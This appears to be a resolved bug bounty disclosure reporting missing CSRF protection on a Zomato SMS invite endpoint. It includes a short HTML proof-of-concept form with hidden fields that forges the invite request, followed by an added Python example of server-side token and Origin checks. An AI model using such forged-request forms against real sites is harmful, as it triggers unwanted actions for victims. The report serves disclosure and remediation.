CSRF AT INVITING PEOPLE THROUGH PHONE NUMBER
Unknown
Vulnerability Details
Hello,
Please Add CSRF Token While Inviting The User Through Phone Number. You Have Good Rate Limit Protection, But At The Same Time Add CSRF TOKEN:
CODE:
<html>
<body>
<form action="https://www.zomato.com/php/restaurantSmsHandler">
<input type="hidden" name="type" value="zomato-app-details" />
<input type="hidden" name="mobile_no" value="xxxxxxxxxxxxxx" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Thanks!
Report Stats
- Report ID: 113865
- State: Closed
- Substate: resolved
- Upvotes: 5
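
A server-side check of the kind the report asks for, as an added example that is not part of the original report and not the vendor's code. The form in the report has no `method` attribute, so a browser submits it as a GET; the sketch rejects that, checks `Origin` when present, and requires a token bound to the user's session. The handler name, the `csrf_token` field name and the session ids are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

# Assumption: a per-deployment secret; generated here only so the example runs.
SERVER_KEY = secrets.token_bytes(32)
ALLOWED_ORIGIN = "https://www.zomato.com"  # origin of the form action in the report


def _mac(session_id: str, nonce: str) -> str:
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id: str) -> str:
    """Token the server embeds in its own invite form, bound to one session."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def csrf_token_valid(session_id: str, token: str) -> bool:
    nonce, sep, sig = token.partition(".")
    if not sep:
        return False
    # Compare as bytes in constant time; bytes also tolerate non-ASCII input.
    return hmac.compare_digest(sig.encode(), _mac(session_id, nonce).encode())


def handle_sms_invite(method, headers, session_id, params):
    """Hypothetical handler: returns (status, reason) instead of sending an SMS."""
    if method != "POST":
        return 405, "state-changing action must not be reachable via GET"
    origin = headers.get("Origin")
    if origin is not None and origin != ALLOWED_ORIGIN:
        return 403, "cross-origin request"
    if not csrf_token_valid(session_id, params.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    return 200, "invite queued for " + params.get("mobile_no", "")


if __name__ == "__main__":
    # Constructed requests: the report's form as submitted, then a legitimate one.
    fields = {"type": "zomato-app-details", "mobile_no": "xxxxxxxxxxxxxx"}
    print(handle_sms_invite("GET", {}, "sess-A", fields))
    print(handle_sms_invite("POST", {"Origin": "https://other.example"}, "sess-A", fields))
    good = dict(fields, csrf_token=issue_csrf_token("sess-A"))
    print(handle_sms_invite("POST", {"Origin": ALLOWED_ORIGIN}, "sess-A", good))
```
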